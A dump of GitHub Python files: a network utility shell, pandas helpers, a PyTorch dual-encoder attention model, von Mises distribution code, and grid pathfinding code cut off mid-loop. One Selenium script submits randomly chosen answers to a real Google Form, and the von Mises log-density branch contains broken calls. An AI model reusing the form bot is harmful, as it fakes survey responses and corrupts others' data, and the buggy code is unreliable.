subprocess.Popen([PATH_TO_PUTTY, \"-ssh\", args.host, \"-l\", args.username, \"-P\", args.port], stdout=subprocess.PIPE)\n else:\n subprocess.Popen([PATH_TO_PUTTY, \"-ssh\", args.host, \"-l\", args.username, \"-pw\", args.password, \"-P\", args.port], stdout=subprocess.PIPE)\n\n # Binary to decimal conversion\n decimal_parser = cmd2.Cmd2ArgumentParser()\n decimal_parser.add_argument(dest='value', type=int, help='Binary to decimal conversion')\n @cmd2.with_argparser(decimal_parser)\n def do_decimal(self, args):\n decimal = 0\n power = 1\n while args.value > 0:\n resto = args.value%10\n args.value = args.value//10\n decimal += resto*power\n power = power*2\n print(decimal)\n\n # Decimal to binary conversion\n binary_parser = cmd2.Cmd2ArgumentParser()\n binary_parser.add_argument(dest='value', type=int, help='Decimal to binary conversion')\n @cmd2.with_argparser(binary_parser)\n def do_binary(self, args):\n print(bin(args.value)[2:])\n\n # Port/protocol finder\n portlist_parser = cmd2.Cmd2ArgumentParser()\n portlist_parser.add_argument(dest='value', help='Port or protocol')\n @cmd2.with_argparser(portlist_parser)\n def do_portlist(self, args):\n try:\n with open(PATH_TO_PORTS_CSV, 'r') as file:\n reader = csv.reader(file, delimiter=\",\")\n # isinstance e' meglio di type\n if isinstance(args.value,str):\n for row in reader:\n if args.value in row:\n print(row[:4])\n else:\n for row in reader:\n if re.search(r'\\b' + args.value + r'\\b', str(row)):\n print(row[:4])\n except FileNotFoundError:\n print(f\"{PATH_TO_PORTS_CSV} does not exist.\")\n except Exception as e:\n print(f\"An error occurred: {e}\")\n\n # tcpRTT calcs TCP RTT to a host usig tcp_latency library\n # common arguments like port number (443 by default), repetitions and timeout (both 5 and 1 by default)\n # if strict is specified only the latency is displayer not the ping-like statistics\n latency_parser = cmd2.Cmd2ArgumentParser()\n latency_parser.add_argument(dest='host', type=str, help='Measure the TCP latency between you to a specified host. Port 443, 5 repetitions and 1 s timeout is the default)')\n latency_parser.add_argument('-p', '--port', type=int, default=443, nargs='?', help='Destination port')\n latency_parser.add_argument('-r', '--repeat', type=int, default=5, nargs='?', help='How many time measure_latency runs')\n latency_parser.add_argument('-t', '--timeout', type=int, default=1, nargs='?', help='Measure_latency timeout')\n latency_parser.add_argument('-s', '--strict', default=False, action='store_true', help='Strict output')\n @cmd2.with_argparser(latency_parser)\n def do_tcpRTT(self, args):\n #print (\"%s, %s, %s, %s, %s, %s\" % (bssid, channel, downRate, upRate, fq, signal))\n print(\"Repetitions: %s, Timeout: %s, Port: %s\" % (args.repeat, args.timeout, args.port))\n if args.strict:\n latency_results = measure_latency(host=args.host, runs=args.repeat, timeout=args.timeout, port=args.port)\n for i in latency_results:\n print(str(round(i,2)))\n else:\n measure_latency(host=args.host, runs=args.repeat, timeout=args.timeout, port=args.port, human_output=True)\n\n # Show interfaces:\n # default is eth\n # verbose and wifi with args\n iplist_parser = cmd2.Cmd2ArgumentParser()\n @cmd2.with_argparser(iplist_parser)\n def do_iplist(self, _): \n swiss_func.list_interfaces()\n\n # Show wifi statistics from netsh\n def do_wifistat(self, args):\n CURRENT_TIME = datetime.now()\n CLOCK_TIME = CURRENT_TIME.strftime(\"%H:%M:%S\")\n netsh_wifi_stats = subprocess.run(['netsh', 'wlan', 'show', 'interfaces'], stdout=subprocess.PIPE)\n outStr = netsh_wifi_stats.stdout.decode('utf-8', 'ignore')\n if \"disconnessa\" in outStr:\n print(\"No Wi-fi connection\")\n elif \"Non disponibile\" in outStr:\n print(\"No Wi-fi connection\")\n else:\n # Need improvments\n for e in outStr.splitlines():\n if \"BSSID\" in e:\n bssid = e[29:]\n elif \"Canale\" in e:\n channel = e[27:]\n elif \"ricezione\" in e:\n downRate = e[32:]\n elif \"trasmissione\" in e:\n upRate = e[34:]\n elif \"frequenza\" in e:\n fq = e[29:]\n elif \"Segnale\" in e:\n signal = e[26:]\n\n #print (\"%s, %s, %s, %s, %s, %s\" % (bssid, channel, downRate, upRate, fq, signal))\n # Wifi statistics table from netsh\n wifi_table = Table(title=\"Wi-Fi statistics from netsh\")\n # Columns\n wifi_table.add_column(\"⏱️\", justify=\"center\", style=\"white\")\n wifi_table.add_column(\"BSSID\", justify=\"center\", style=\"white\")\n wifi_table.add_column(\"Download rate\", justify=\"center\", style=\"yellow\")\n wifi_table.add_column(\"Upload rate\", justify=\"center\", style=\"yellow\")\n wifi_table.add_column(\"Protocol\", justify=\"center\", style=\"green\")\n wifi_table.add_column(\"Channel\", justify=\"center\", style=\"green\")\n wifi_table.add_column(\"Signal\", justify=\"center\", style=\"green\")\n # Rows\n wifi_table.add_row(CLOCK_TIME, bssid, downRate, upRate, fq, channel, signal)\n RICH_CONSOLE.print(wifi_table)\n\n # Show my public IP address\n pubip_parser = cmd2.Cmd2ArgumentParser()\n pubip_parser.add_argument('-v', '--verbose', default=False, action='store_true', help='show ip public info from ifconfing.co API')\n @cmd2.with_argparser(pubip_parser)\n def do_pub(self, args):\n if args.verbose:\n try:\n print(\"Verbose API call\")\n print(requests.get(\"http://ifconfig.co/json\").json())\n except Exception as e:\n print(f\"An error occurred: {e}\")\n else:\n try:\n print(requests.get(\"https://api.ipify.org?format=text\").text)\n except Exception as e:\n print(f\"An error occurred: {e}\")\n # Ping using pythonping + if spw argument is specified the script try to open a shell pinging (NOT WORKING NEEDS ATTENTION)\n # Using uname_output we can check if we are in a Linux o Win machine\n ping_parser = cmd2.Cmd2ArgumentParser()\n ping_parser.add_argument(dest='address', type=str, help='IP Address')\n ping_parser.add_argument('-r', '--repeat', type=int, default=3, nargs='?', help='output [n] times')\n ping_parser.add_argument('-spw', '--spawn', default=False, action=\"store_true\")\n ping_parser.add_argument('-t', '--loop', default=False, action=\"store_true\")\n @cmd2.with_argparser(ping_parser)\n def do_ping(self, args):\n if OPERATING_SYSTEM == \"Windows\":\n if args.spawn:\n subprocess.run([\"start\", \"cmd\", \"/K\", \"ping\", \"-t\", args.address], shell=True)\n else:\n if args.loop == False:\n for i in range(0, args.repeat):\n CURRENT_TIME = datetime.now()\n CLOCK_TIME = CURRENT_TIME.strftime(CLOCK_FORMAT)\n print(CLOCK_TIME, end =\" \")\n ping(args.address, verbose=True, count=1, interval=1)\n else:\n while True:\n CURRENT_TIME = datetime.now()\n CLOCK_TIME = CURRENT_TIME.strftime(CLOCK_FORMAT)\n print(CLOCK_TIME, end =\" \")\n ping(args.address, verbose=True, count=1, interval=1)\n else:\n if args.spawn:\n subprocess.Popen('x-terminal-emulator -e \"bash -c \\\\\"ping 1.1.1.1; exec bash\\\\\"\"', shell=True)\n\n # Opening a list of programs with external bat if OS is Windows\n # https://builtin.com/software-engineering-perspectives/python-progress-bar\n openapps_parser = cmd2.Cmd2ArgumentParser()\n @cmd2.with_argparser(openapps_parser)\n def do_openapps(self, _):\n if OPERATING_SYSTEM == \"Windows\":\n try:\n with open(OPENAPPS_SCRIPT, 'r') as file:\n line_list = file.read().splitlines()\n for i in line_list: print (i)\n except FileNotFoundError:\n print(f\"{OPENAPPS_SCRIPT} does not exist.\")\n except Exception as e:\n print(f\"An error occurred: {e}\")\n with MoonSpinner('CTRL+C to stop openapps.bat') as bar:\n for i in range(6):\n sleep(0.5)\n bar.next()\n subprocess.call([OPENAPPS_SCRIPT])\n else:\n print(OPERATING_SYSTEM)\n\n\n\n # Grepping file from the GREP_FOLDER pat; needs improvements\n grep_parser = cmd2.Cmd2ArgumentParser()\n grep_parser.add_argument(dest='value', type=str, help='String to find in file')\n grep_parser.add_argument('-f', '--filename', type=str, help='Just the filename')\n #grep_parser.add_argument('-fp', '--filepath', type=str, help='Just the filename')\n @cmd2.with_argparser(grep_parser)\n def do_grep(self, args):\n print(\"File: \" + str(GREP_FOLDER) + args.filename)\n try:\n with open(str(GREP_FOLDER) + \"/\" + args.filename, 'r') as file:\n line_list = file.read().splitlines()\n for i in line_list:\n if args.value in i:\n print(i)\n except FileNotFoundError:\n print(f\"The file {args.value} does not exist.\")\n except Exception as e:\n print(f\"An error occurred: {e}\")\n\n # Change ip on Windows with command line\n changeip_parser = cmd2.Cmd2ArgumentParser()\n changeip_parser.add_argument(dest='interface_name', type=str, help='Interface name like \"Ethernet\"')\n changeip_parser.add_argument('-dhcp', '--dhcp', default=False, action=\"store_true\", help=\"Change ip to static/dynamic using netsh\")\n @cmd2.with_argparser(changeip_parser)\n def do_changeip(self, args):\n if OPERATING_SYSTEM == \"Windows\":\n if args.dhcp == False:\n # Collect\n print(\"Working on interface: \" + args.interface_name)\n input_ipv4 = input(\"IP address: \")\n input_subnet = input(\"Subnet mask: \")\n input_gateway = input(\"Gateway: \")\n subprocess.run([\"netsh\", \"interface\", \"ipv4\", \"set\", \"address\", \"name=\" + args.interface_name, \"static\", input_ipv4, input_subnet, input_gateway], shell=True)\n else:\n # -dhcp is True then set the interface to dhcp\n subprocess.run([\"netsh\", \"interface\", \"ipv4\", \"set\", \"address\", \"name=\" + args.interface_name, \"source=dhcp\"], shell=True)\n else:\n print(OPERATING_SYSTEM)\n \n # WLC Debug parser\n debug_parser = cmd2.Cmd2ArgumentParser()\n debug_parser.add_argument('-f', '--filename', type=str, default='debug_parser/debugTrace_1.txt', help='File path to debug trace file, default is debug_parser/debugTrace_1.txt')\n debug_parser.add_argument('-id', '--idname', type=str, default=CURRENT_TIME.strftime(\"%H%M%S\"), help='Set the table name, default is the time as %H%M%S')\n debug_parser.add_argument('-t', '--template', type=str, default=(\"state\"), choices=[\"state\", \"EAP\", \"reasons\", \"association\", \"timeouts\"], help='Select a template to parse the debug file in the db')\n @cmd2.with_argparser(debug_parser)\n def do_debug(self, args):\n swiss_func.debug_to_db(args.filename, args.idname)\n\n # Test command\n hello_parser = cmd2.Cmd2ArgumentParser()\n hello_parser.add_argument('-name', type=str, default='Robot', help='A nice hello to test functions')\n hello_parser.add_argument('-surname', type=str, default='Spaceship', help='A nice hello to test functions')\n hello_parser.add_argument('-t', '--template', type=str, default='red', choices=[\"red\", \"green\", \"blue\"], help='Select a hello template')\n @cmd2.with_argparser(hello_parser)\n def do_hello(self, args):\n swiss_func.hello_world(args.name, args.surname, args.template)\n\n # Open a URL in a new tab in Firefox\n fire_parser = cmd2.Cmd2ArgumentParser()\n fire_parser.add_argument('-url', type=str, default='https://www.cyberciti.biz/faq/howto-run-firefox-from-the-command-line/', help='Opening tabs in Firefox from the commandline')\n #fire_parser.add_argument('-surname', type=str, default='Spaceship', help='A nice fire to test functions')\n @cmd2.with_argparser(fire_parser)\n def do_fire(self, args):\n try:\n webbrowser.get(\"firefox\").open_new_tab(args.url)\n except Exception as e:\n print(f\"An error occurred: {e}\")\n\n # Dividing commands in categories (help command)\n categorize((do_debug), \"WLC debug parser\")\n categorize((do_pub, do_iplist, do_macvendor, do_tcpRTT, do_wifistat, do_nslookup, do_portlist, do_ipcheck, do_ping, do_changeip), \"Network\")\n categorize((do_binary, do_decimal, do_subnet), \"Calc\")\n categorize((do_putty), \"SSH\")\n categorize((do_grep), \"Files\")\n categorize((do_fire, do_openapps), \"Browser and apps\")\n categorize((do_time, do_hello), \"Miscellanea\")\n\nif __name__ == '__main__':\n import sys\n c = SwissKnife()\n sys.exit(c.cmdloop())\n","repo_name":"lu-tar/swiss-knife","sub_path":"swiss_shell.py","file_name":"swiss_shell.py","file_ext":"py","file_size_in_byte":17956,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"34243885921","text":"\r\nfrom sklearn.ensemble import RandomForestRegressor, RandomForestClassifier\r\n\r\nfrom IPython.display import display\r\n\r\nfrom sklearn import metrics\r\n\r\nimport numpy as np \r\n\r\ndef display_all(df):\r\n display(df)\r\n\r\ndef add_datepart(df, fldname):\r\n fld = df[fldname]\r\n targ_pre = re.sub('[Dd]ate$', '' , fldname)\r\n for n in ('Year', 'Month', 'Week', 'Day', 'Dayofweek', 'Dayofyear',\r\n 'Is_month_end', 'Is_month_start', 'Is_quarter_end', 'Is_quarter_start', 'Is_year_end', 'Is_year_start'):\r\n df[targ_pre+n] = getattr(fld.dt,n.lower())\r\n df[targ_pre+'Elapse'] = (fld - fld.min()).dt.days\r\n df.drop(fldname, axis=1, inplace=True)\r\n\r\ndef train_cats(df):\r\n for n,c in df.items():\r\n if is_string_dtype(c): df[n] = c.astype('category').cat.as_ordered()\r\n","repo_name":"chukwumaokere/tldr.ai","sub_path":"structured.py","file_name":"structured.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7687372197","text":"class flat:\r\n def __init__(self,name,age,year):\r\n self.name= name\r\n self.age= age\r\n self.year= year\r\na= flat(\"naman\",19,\"1st year\")\r\nb= flat(\"chirag\",18,\"1st year\")\r\n\r\nprint(a.__dict__,b.__dict__)\r\nclass partner(flat):\r\n def __init__(self,name,age,year,contact):\r\n self.name= name\r\n self.age= age\r\n self.year= year\r\n self.contact= contact\r\nc= partner(\"shreyas\",\"18\",\"1st\",100)\r\nprint(c.__dict__)\r\n\r\n ","repo_name":"prabalgautam05/prabal-gautam","sub_path":"oops.py","file_name":"oops.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42832854346","text":"from selenium import webdriver\nimport time\nimport random\n\n# Opciones de navegación\noptions = webdriver.ChromeOptions()\noptions.add_argument('--start-maximized')\noptions.add_argument('--disable-extensions')\n\ndriver_path = 'C:\\\\Users\\\\Ruben\\\\Desktop\\\\PROG\\\\chromedriver.exe'\n\ndriver = webdriver.Chrome(driver_path, chrome_options = options)\ntime.sleep(1)\n\n#Damos la url a la que queremos scrappear\nurl = 'https://docs.google.com/forms/d/e/1FAIpQLSc8WWN_IW9KeSqLx6fEhmFKzXZXrPqP4MkAZXQKKpKZ1O87gw/viewform'\n#Iniciamos el navegador\ndriver.get(url)\n\n\ndef fill_forms (ans1, ans2, ans3, ans4, ans5, ans6, ans7, ans8, ans9):\n question1 = None\n question2 = None\n question3 = None\n question4 = None\n question5 = None\n question6 = None\n question7 = None\n question8 = None\n question9 = None\n \n questionGroup = driver.find_elements_by_class_name(\"Qr7Oae\")\n\n if questionGroup:\n question1 = questionGroup[0].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question2 = questionGroup[1].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question3 = questionGroup[2].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question4 = questionGroup[3].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question5 = questionGroup[4].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question6 = questionGroup[5].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question7 = questionGroup[6].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question8 = questionGroup[7].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n question9 = questionGroup[8].find_elements_by_class_name(\"AB7Lab.Id5V1\")\n\n if question1:\n question1[int(ans1)].click()\n if question2:\n question2[int(ans2)].click()\n if question3:\n question3[int(ans3)].click()\n if question4:\n question4[int(ans4)].click()\n if question5:\n question5[int(ans5)].click()\n if question6:\n question6[int(ans6)].click()\n if question7:\n question7[int(ans7)].click()\n if question8:\n question8[int(ans8)].click()\n if question9:\n question9[int(ans9)].click()\n\n submit = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[3]/div/div[1]/div/span/span')\n submit.click()\n\n driver.close()\n\n\nbutton_range1 = random.randint(0,3)\nbutton_range2 = random.randint(0,4)\nbutton_range3 = 0\nbutton_range4 = random.randint(0,2)\nbutton_range5 = 0\nbutton_range6 = 0\nbutton_range7 = random.randint(0,2)\nbutton_range8 = random.randint(0,2)\nbutton_range9 = random.randint(0,1)\n\nfill_forms(button_range1, button_range2, button_range3, button_range4, button_range5, button_range6, button_range7, button_range8, button_range9)","repo_name":"RubenM19/Selenium_FillForms---Python","sub_path":"prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20968883872","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom .dualencodernet import DualEncoderNet\n\n\nclass DualEncoderAttentionNet(DualEncoderNet):\n \"\"\"DualEncoderAttentionNet\n Args:\n dim_embedding (int): The number of features in the input word embeddings.\n rnn_module (str): The module for rnn (LSTM/GRU).\n hidden_size (int): The number of features in the hidden state h.\n num_layers (int): Number of recurrent layers. E.g., setting num_layers=2 would mean stacking two GRUs together to form a stacked GRU, with the second GRU taking in outputs of the first GRU and computing the final results.\n dropout (int): If non-zero, introduces a Dropout layer on the outputs of each GRU layer except the last layer, with dropout probability equal to dropout\n bidirectional (bool): If True, becomes a bidirectional GRU.\n \"\"\"\n def __init__(self, dim_embedding, rnn_module='GRU', hidden_size=64, num_layers=1, dropout=0, bidirectional=False):\n super(DualEncoderAttentionNet, self).__init__(dim_embedding, rnn_module, hidden_size, num_layers, dropout, bidirectional)\n del self.rnn, self.context_to_option\n self.rnn0 = self.rnn_module(input_size=dim_embedding,\n hidden_size=hidden_size,\n num_layers=num_layers,\n dropout=dropout,\n bidirectional=bidirectional)\n self.rnn1 = self.rnn_module(input_size=4*hidden_size if bidirectional else 2*hidden_size,\n hidden_size=hidden_size,\n num_layers=num_layers,\n dropout=dropout,\n bidirectional=bidirectional)\n self.attention = Attention(hidden_size, bidirectional)\n \n # transform option to \"contexted\" space for better similarity comparision\n features = 4 * hidden_size if bidirectional else 2 * hidden_size\n self.context_to_option = nn.Sequential(nn.Linear(features, features),\n nn.ReLU(inplace=True),\n nn.Linear(features, features))\n \n for name, param in self.rnn0.named_parameters():\n if 'weight' in name and param.requires_grad:\n nn.init.orthogonal_(param) \n for name, param in self.rnn1.named_parameters():\n if 'weight' in name and param.requires_grad:\n nn.init.orthogonal_(param)\n \n def forward(self, context, context_len, options, option_lens):\n \"\"\"\n The DialogDataset generate context and options\n Args:\n context (tensor): (batch, padded_context_len, dim_embedding) padded_context_len = max(context_len)\n context_len (tensor): (batch, ) original length of the context\n options (tensor): (batch, n_samples, padded_option_len, dim_embedding) padded_option_len = max(option_lens)\n option_lens (tensor): (batch, n_samples) original length of the options\n \"\"\"\n # features = num_directions * hidden_size, num_directions = 2 if bidirectional else 1\n context_output = self.packed_forward(self.rnn0, context.transpose(1, 0), context_len) # context_output: (padded_context_len, batch, features)\n attentioned_context = torch.cat([context_output, context_output], dim=-1)\n attentioned_context_output = self.packed_forward(self.rnn1, attentioned_context, context_len) # attentioned_context_output: (padded_context_len, batch, features)\n \n # concatenate two pooling mode features, condensed_context_output: (batch, 2*features)\n condensed_context_output = torch.cat([self.pooling(attentioned_context_output, context_len, pooling_mode='last'),\n self.pooling(attentioned_context_output, context_len, pooling_mode='max')], dim=-1)\n condensed_context_output = self.context_to_option(condensed_context_output)\n \n logits = []\n for option, option_len in zip(options.transpose(1, 0), option_lens.transpose(1, 0)):\n option_output = self.packed_forward(self.rnn0, option.transpose(1, 0), option_len) # option_output: (padded_option_len, batch, features)\n attentioned_option = self.attention(context_output, context_len, option_output, option_len) # attentioned_option: (padded_option_len, batch, features)\n \n # interaction: concatenate the features before and after the attention\n attentioned_option = torch.cat([option_output, attentioned_option], dim=-1)\n attentioned_option_output = self.packed_forward(self.rnn1, attentioned_option, option_len) # attentioned_option_output: (padded_option_len, batch, features)\n \n # concatenate two pooling mode features, condensed_option_output: (batch, 2*features)\n condensed_option_output = torch.cat([self.pooling(attentioned_option_output, option_len, pooling_mode='last'),\n self.pooling(attentioned_option_output, option_len, pooling_mode='max')], dim=-1)\n \n # compute the similarity by inner product and sigmoid normalization, logit: (batch,)\n logit = torch.sigmoid((condensed_context_output * condensed_option_output).sum(dim=-1))\n logits.append(logit)\n logits = torch.stack(logits, dim=1) # logits: (batch, n_samples)\n return logits\n \n\nclass Attention(nn.Module):\n \"\"\"Attention: attention layer proposed by Luong et al. \n ref: https://pytorch.org/tutorials/beginner/chatbot_tutorial.html#decoder\n Args: \n hidden_size (int): refer to DualEncoderAttentionNet's argumemt\n bidirectional (bool): refer to DualEncoderAttentionNet's argumemt\n \"\"\"\n def __init__(self, hidden_size=64, bidirectional=False):\n super(Attention, self).__init__()\n self.hidden_size = hidden_size\n self.bidirectional = bidirectional\n self.option_attention_weights = torch.randn([100, 50, 350], requires_grad=True) # the attention map\n \n # transform option to \"contextned\" space for better similarity comparision\n if bidirectional:\n self.option_to_context = nn.Sequential(nn.Linear(2 * hidden_size, 2 * hidden_size, bias=False),\n nn.ReLU(inplace=True),\n nn.Linear(2 * hidden_size, 2 * hidden_size, bias=False))\n else:\n self.option_to_context = nn.Sequential(nn.Linear(hidden_size, hidden_size, bias=False),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_size, hidden_size, bias=False))\n \n def forward(self, context, context_len, option, option_len):\n \"\"\"\n Args:\n context: (padded_context_len, batch, features)\n context_len (tensor): (batch, ) original length of the context\n option: (padded_option_len, batch, features)\n option_len (tensor): (batch, ) original length of the option\n \"\"\"\n contexted_option = self.option_to_context(option.transpose(1, 0)) # contexted_option: (batch, padded_option_len, features)\n \n # compute similarity by inner product, context.transpose(1, 0): (batch, padded_context_len, features), contexted_option.transpose(2, 1): (batch, features, padded_option_len), energies: (batch, padded_context_len, padded_option_len)\n energies = torch.bmm(context.transpose(1, 0), contexted_option.transpose(2, 1))\n \n # compute attention weights by applying softmax, option_attention_weights: (batch, padded_option_len, padded_context_len)\n self.option_attention_weights = F.softmax(energies, dim=1).transpose(2, 1)\n \n # attentioned_option: (padded_option_len, batch, features) \n attentioned_option = torch.bmm(self.option_attention_weights, context.transpose(1, 0)).transpose(1, 0)\n return attentioned_option\n","repo_name":"peter850706/A-retrieval-based-chatbot","sub_path":"src/modules/dualencoderattentionnet.py","file_name":"dualencoderattentionnet.py","file_ext":"py","file_size_in_byte":8210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16220138274","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport scipy.integrate as integrate\nfrom scipy.optimize import brentq as root\nimport math\nimport numpy as np\nimport scipy.special as scp\nfrom scipy.special import iv\n\n\n# In[2]:\n\n\ndef rvonmises(n, mu, kappa):\n vm = np.zeros(n)\n a = 1 + (1 + 4 * (kappa**2))**0.5\n b = (a - (2 * a)**0.5)/(2 * kappa)\n r = (1 + b**2)/(2 * b)\n obs = 0\n while (obs < n):\n U1 = np.random.uniform(0, 1, 1)\n z = np.cos(np.pi * U1)\n f = (1 + r * z)/(r + z)\n c = kappa * (r - f)\n U2 = np.random.uniform(0, 1, 1)\n if (c * (2 - c) - U2 > 0):\n U3 = np.random.uniform(0, 1, 1)\n vm[obs] = np.sign(U3 - 0.5) * math.acos(f) + mu\n vm[obs] = vm[obs] % (2 * np.pi)\n obs = obs + 1\n else:\n if (math.log(c/U2) + 1 - c >= 0):\n U3 = np.random.uniform(0, 1, 1)\n vm[obs] = np.sign(U3 - 0.5) * math.acos(f) + mu\n vm[obs] = vm[obs] % (2 * math.pi)\n obs = obs + 1\n return(vm)\n\n\n# In[3]:\n\n\ndef dvonmises(x, mu, kappa, log = False):\n if (type(x) == int):\n x = [x]\n if (type(x) == float):\n x = [x]\n vm = np.zeros(len(x))\n if (log):\n if (kappa == 0):\n vm = np.log(np.repreat(1/(2*pi), len(x)))\n elif (kappa < 100000):\n vm = -(np.log(2*math.pi)+np.log(scp.ive(0, kappa)) + kappa) + kappa*(np.cos(np.subtract(x - mu)))\n else:\n if (((x-mu)%(2*math.pi))==0):\n vm = math.inf\n else:\n vm = -math.inf\n else:\n if (kappa == 0):\n vm = np.repeat(1/(2*np.pi), len(x))\n elif (kappa < 100000):\n vm = 1/(2 * np.pi * scp.ive(0, kappa)) * (np.exp(np.subtract(np.cos(np.subtract(x, mu)), 1)))**kappa\n else:\n if (np.mod(np.subtract(x, mu),(2*np.pi))==0):\n vm = math.inf\n else:\n vm = 0\n return(vm)\n\n\n# In[21]:\n\n\ndef pvonmises(q, mu, kappa, tol = 1e-020):\n from_ = mu - np.pi\n mu = (mu - from_) % (2 * np.pi)\n if (type(q) == int):\n q = [q]\n if(type(q) == float):\n q =[q]\n q = np.mod(np.subtract(q, from_), (2 * np.pi))\n q = np.mod(q,(2 * np.pi))\n n = len(q)\n mu = mu % (2 * np.pi)\n def pvm_mu0(q, kappa, tol):\n flag = True\n p = 1\n sum_ = 0\n while (flag):\n term = (iv(p, kappa) * np.sin(np.multiply(q, p)))/p\n sum_ = sum_ + term\n p = p + 1\n if (abs(term) < tol):\n flag = False\n return(np.divide(q,(2 * np.pi)) + sum_/(np.pi * iv(0, kappa)))\n\n result = np.repeat(np.nan, n)\n if (mu == 0):\n for i in range(0,n):\n result[i] = pvm_mu0(q[i], kappa, tol)\n else:\n for i in range(0,n):\n if (q[i] <= mu):\n upper = (q[i] - mu) % (2 * np.pi)\n if (upper == 0):\n upper = 2 * np.pi\n lower = (-mu) % (2 * np.pi)\n result[i] = pvm_mu0(upper, kappa, tol) - pvm_mu0(lower, kappa, tol)\n else:\n upper = q[i] - mu\n lower = mu % (2 * np.pi)\n result[i] = pvm_mu0(upper, kappa, tol) + pvm_mu0(lower, kappa, tol)\n return(result)\n\n\n# In[63]:\n\n\ndef qvonmises(p, mu = 0 , kappa = None, from_ = None, tol = np.finfo(float).eps**0.6):\n epsilon = 10 * np.finfo(float).eps ##epsilon is Python equivalent of .Machine$double.eps\n if (type(p) == int):\n p = np.array([p])\n elif (type(p) == float):\n p = np.array([p])\n else:\n p = np.array(p)\n if (np.any(p > 1)): \n raise ValueError(\"p must be in [0,1]\")\n elif (np.any(p < 0)):\n raise ValueError(\"p must be in [0,1]\")\n\n if (pd.isnull(from_)):\n from_ = mu - np.pi\n \n n = p.size\n mu = (mu - from_)%(2 * np.pi) \n if (pd.isnull(kappa)): \n raise ValueError(\"kappa must be provided\") \n \n def zeroPvonmisesRad(x, p, mu, kappa):\n if (np.isnan(x)): \n y = np.nan \n else: \n integration = integrate.quad(lambda x: dvonmises(x, mu, kappa), 0, x)\n y = integration[0] - p ##integration[0] will give the value\n return(y);\n \n value = np.repeat(np.nan, p.size)\n for i in range(p.size):\n try:\n value[i] = root(lambda x: zeroPvonmisesRad(x, p[i], mu, kappa), 0, 2 * np.pi - epsilon)\n except:\n pass\n if(p[i] < (10 * epsilon)):\n value[i] = 0\n elif (p[i] > (1 - 10 * epsilon)):\n value[i] = 2 * np.pi - epsilon \n value += from_\n return(value)\n\n","repo_name":"vedantmehta2808/vonMises-Package-Python","sub_path":"vonMises.py","file_name":"vonMises.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23667255320","text":"from queue import PriorityQueue\nfrom dataclasses import dataclass\nfrom math import ceil, log\n\nimport numpy as np\nfrom .constants import MAP_SYMBOLS, MAP_VALUES\n\n\n@dataclass\nclass Node:\n coords: (int, int)\n obstacle: bool\n price: int = float(\"inf\")\n visited: bool = False\n\n def enter(self, parent):\n self.price = parent.price + self.distance(parent)\n\n def distance(self, other):\n sigma = np.power(self.coords[0] - other.coords[0], 2)\n sigma += np.power(self.coords[1] - other.coords[1], 2)\n return np.sqrt(sigma)\n\n def neighbours(self, width, height):\n valid_coords = []\n for x in [-1, 0, 1]:\n for y in [-1, 0, 1]:\n if 0 <= self.coords[0] + x < width and 0 <= self.coords[1] + y < height:\n if x == 0 and y == 0:\n continue\n valid_coords.append((self.coords[0] + x, self.coords[1] + y))\n return valid_coords\n\n def __lt__(self, other):\n return self.price < other.price\n\n\ndef create_grid(width, height, gate=None):\n if width < 3 or height < 3:\n raise ValueError(\"Map cannot have dimensions lower than 3 due to walls\")\n dimensions = (height, width)\n grid = np.zeros(shape=dimensions)\n grid[:, 0] = -1\n grid[:, -1] = -1\n grid[0, :] = -1\n grid[-1, :] = -1\n if gate:\n x, y = gate\n if 0 < x < width and 0 < y < height:\n np_coords = (y, x)\n grid[np_coords] = 100\n else:\n raise ValueError(\"Gate in invalid position \"+str(gate)+\" in grid \" + str(dimensions))\n return grid\n\n\ndef load_grid(filename):\n with open(filename) as f:\n dimensions = list(map(int, f.readline().split()))\n width, height = dimensions\n dimensions = height, width\n grid = np.zeros(shape=dimensions)\n for row in range(height):\n line = f.readline().strip()\n for column, c in enumerate(line):\n if c not in MAP_SYMBOLS:\n raise ValueError(\"Unknown character when loading map from file\")\n np_coords = (row, column)\n grid[np_coords] = MAP_SYMBOLS[c]\n return grid\n\n\ndef save_grid(grid, filename):\n columns, rows = grid.shape\n with open(filename, \"w+\") as f:\n f.write(str(columns)+\" \"+str(rows)+\"\\n\")\n for row in range(rows):\n for c in grid[row]:\n f.write(MAP_VALUES[c])\n f.write(\"\\n\")\n\n\ndef normalize_grid(static_field):\n return static_field / np.nanmax(static_field[static_field != np.inf])\n\n\ndef compute_static_field(grid, normalize=False):\n q = PriorityQueue()\n grid_nodes = []\n gate = None\n height, width = grid.shape\n for y in range(height):\n grid_nodes.append([])\n for x in range(width):\n coords = (x, y)\n np_coords = (y, x)\n node = Node(coords, grid[np_coords] < 0)\n if grid[np_coords] == 100:\n gate = Node(coords, False)\n node = gate\n grid_nodes[y].append(node)\n\n if not gate:\n raise ValueError(\"Gate is not present in the map. Can't compute static field.\")\n\n gate.price = 0\n q.put(gate)\n cnt = 0\n closest_2power = int(ceil(log(width*height) / log(2)))\n closest_2mod = 2**closest_2power\n while q.qsize() > 0:\n cnt += 1\n if cnt % closest_2mod == 0:\n print(q.qsize(), cnt)\n current_node = q.get()\n current_node.visited = True\n while 